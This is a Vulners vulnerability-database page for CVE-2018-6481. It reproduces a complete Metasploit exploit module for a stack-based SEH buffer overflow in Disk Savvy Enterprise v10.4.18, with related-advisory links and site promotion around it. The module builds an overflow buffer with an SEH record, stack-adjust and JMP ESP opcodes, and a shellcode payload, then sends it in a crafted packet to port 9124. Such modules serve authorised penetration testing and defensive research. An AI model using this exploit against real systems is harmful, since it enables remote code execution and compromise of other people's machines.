Lucene search
+L

Disk Savvy Enterprise v10.4.18

🗓️ 31 Jan 2017 00:00:00Reported by Daniel TeixeiraType 
metasploit
 metasploit
🔗 www.rapid7.com👁 47 Views

Stack-based buffer overflow in Disk Savvy Enterprise v10.4.18 on Windows 7 SP1 x8

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH) Exploit
21 Feb 201800:00
zdt
circl
Circl
CVE-2018-6481
6 Feb 202503:13
circl
cnvd
CNVD
Flexense Disk Savvy Enterprise Buffer Error Vulnerability
1 Mar 201800:00
cnvd
cve
CVE
CVE-2018-6481
27 Feb 201819:00
cve
cvelist
Cvelist
CVE-2018-6481
27 Feb 201819:00
cvelist
exploitdb
Exploit DB
Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)
21 Feb 201800:00
exploitdb
exploitpack
exploitpack
Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)
21 Feb 201800:00
exploitpack
nvd
NVD
CVE-2018-6481
27 Feb 201819:29
nvd
osv
OSV
CVE-2018-6481
27 Feb 201819:29
osv
packetstorm
Packet Storm
Disk Savvy Enterprise 10.4.18 Buffer Overflow
23 Feb 201800:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Disk Savvy Enterprise v10.4.18',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability
          in Disk Savvy Enterprise v10.4.18, caused by improper bounds
          checking of the request sent to the built-in server. This module
          has been tested successfully on Windows 7 SP1 x86.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Daniel Teixeira'
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Payload' => {
          'BadChars' => "\x00\x02\x0a\x0d\xf8",
          'Space' => 800
        },
        'Referencess' => [
          [ 'CVE', '2018-6481' ]
        ],
        'Targets' => [
          [
            'Disk Savvy Enterprise v10.4.18',
            {
              'Offset' => 124,
              'Ret' => 0x10056d13
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2017-01-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(9124)])
  end

  def exploit
    seh = generate_seh_record(target.ret)
    connect

    buffer = make_nops(target['Offset'])
    buffer << seh
    buffer << "\x83\xc4\x7f" * 13   # ADD esp,7fh
    buffer << "\x83\xc4\x21"        # ADD esp,21h
    buffer << "\xff\xe4"            # JMP esp
    buffer << payload.encoded
    buffer << Rex::Text.rand_text_alphanumeric(1)

    header = "\x75\x19\xba\xab"
    header << "\x03\x00\x00\x00"
    header << "\x00\x40\x00\x00"
    header << [buffer.length].pack("V")
    header << [buffer.length].pack("V")
    header << [buffer[-1].ord].pack("V")
    packet = header
    packet << buffer

    sock.put(packet)
    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Jan 2017 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 27.5
CVSS 3.19.8
EPSS0.20655
47